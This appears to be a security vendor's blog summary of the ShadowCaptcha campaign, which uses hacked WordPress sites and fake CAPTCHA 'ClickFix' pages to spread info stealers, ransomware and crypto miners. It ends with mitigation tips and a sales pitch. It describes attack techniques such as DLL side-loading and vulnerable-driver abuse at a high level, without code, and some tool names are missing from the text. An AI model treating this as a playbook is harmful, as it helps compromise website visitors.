A sophisticated cyber campaign, dubbed ShadowCaptcha, is actively exploiting over 100 compromised WordPress websites. This campaign redirects unsuspecting visitors to deceptive CAPTCHA verification pages, employing social engineering tactics to distribute a dangerous mix of malware, including information stealers, ransomware, and cryptocurrency miners. The operation, first identified in August 2025, highlights the evolving nature of cyber threats targeting widely used web platforms.

Key Takeaways

• ShadowCaptcha leverages fake CAPTCHA pages and social engineering to deliver malware.

• The campaign targets WordPress sites, impacting users globally.

• Malware payloads include information stealers, ransomware, and crypto miners.

• Attackers use techniques like living-off-the-land binaries (LOLBins) and DLL side-loading.

• Compromised sites are prevalent in Australia, Brazil, Italy, Canada, Colombia, and Israel.

ShadowCaptcha Campaign Details

The ShadowCaptcha campaign begins by injecting malicious JavaScript code into compromised WordPress sites. This code initiates a redirection chain, leading users to fake CAPTCHA pages designed to mimic legitimate services like Cloudflare or Google. The campaign utilizes a social engineering tactic known as ClickFix, which tricks users into executing malicious commands.

The attack chain bifurcates based on the instructions presented on the fake CAPTCHA page. One path involves the Windows Run dialog, leading to the deployment of Lumma and Rhadamanthys information stealers via MSI installers. The other path guides victims to save a page as an HTML Application (HTA) and execute it using , which can result in the installation of Epsilon Red ransomware.

Malware and Techniques Employed

Researchers have noted the use of advanced techniques within the ShadowCaptcha campaign. These include anti-debugger measures to hinder analysis and DLL side-loading to disguise malicious code execution as legitimate processes. Some variants of the campaign have also been observed distributing an XMRig-based cryptocurrency miner, with configurations fetched from Pastebin for dynamic adjustments.

In instances where cryptocurrency miners are deployed, attackers have been known to drop a vulnerable driver, , to gain kernel-level access. This allows for direct interaction with CPU registers, aiming to boost mining efficiency. The campaign's reach extends across various sectors, including technology, hospitality, legal/finance, healthcare, and real estate.

WordPress Site Compromise and Mitigation

While the exact method of WordPress site compromise remains unclear, security experts suggest that attackers likely exploit known vulnerabilities in plugins or gain access through compromised administrator credentials. The affected WordPress sites are predominantly located in Australia, Brazil, Italy, Canada, Colombia, and Israel.

To combat the threat posed by ShadowCaptcha, users are advised to be vigilant against ClickFix campaigns. Essential security practices include network segmentation to prevent lateral movement, keeping WordPress sites updated with the latest security patches, and implementing multi-factor authentication (MFA) for enhanced protection. The campaign underscores the need for robust security measures and user awareness in the face of evolving cyber threats.

As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.

Sources

• ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners, LinkedIn.

• ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners, The Hacker News.